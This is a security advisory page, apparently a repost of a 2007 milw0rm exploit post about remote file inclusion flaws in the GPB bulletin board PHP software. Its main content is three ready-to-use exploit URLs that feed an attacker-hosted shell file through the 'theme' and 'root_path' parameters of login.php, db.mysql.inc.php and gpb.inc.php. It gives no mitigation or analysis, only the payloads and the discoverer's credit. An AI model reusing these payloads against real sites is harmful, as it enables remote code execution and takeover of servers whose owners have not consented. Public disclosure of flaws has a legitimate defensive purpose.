Computer Security

Security Advisory: GPB bulletin board Remote file include
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  PHP-Ring Webring System 0.9 Remote SQL Injection Vulnerability

  Maran PHP Forum (forum_write.
php) Remote Code Execution Vulnerability

  JChit counter 1.0.0 (imgsrv.php ac) Remote File Disclosure Vulnerability

  AWBS v2.4.0  Remote file include[cart2.php]

From:ThE TiGeR <miro_tiger100_(at)_hotmail.com>
Date:30.04.2007
Subject:GPB bulletin board Remote file include

#GPB bulletin board Remote file include                                                        

#Download script : http://gpb.sourceforge.net/download/archive/gpb-unstable-2001.11.14-1.tar.gz

#D0rk : Download Script and install it in ur machine

#Exploit :

#http://localhost/[gpb_path]/themes/ubb/login.php?theme=shell.txt?

#http://localhost/gpb/include/db.mysql.inc.php?root_path= shell.txt?

#http://localhost/gpb/include/gpb.inc.php?root_path=shell.txt?

#Discovered by : ThE TiGeR

#Miro_Tiger100[at]hotmail[dot]com

# milw0rm.com [2007-04-24]
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server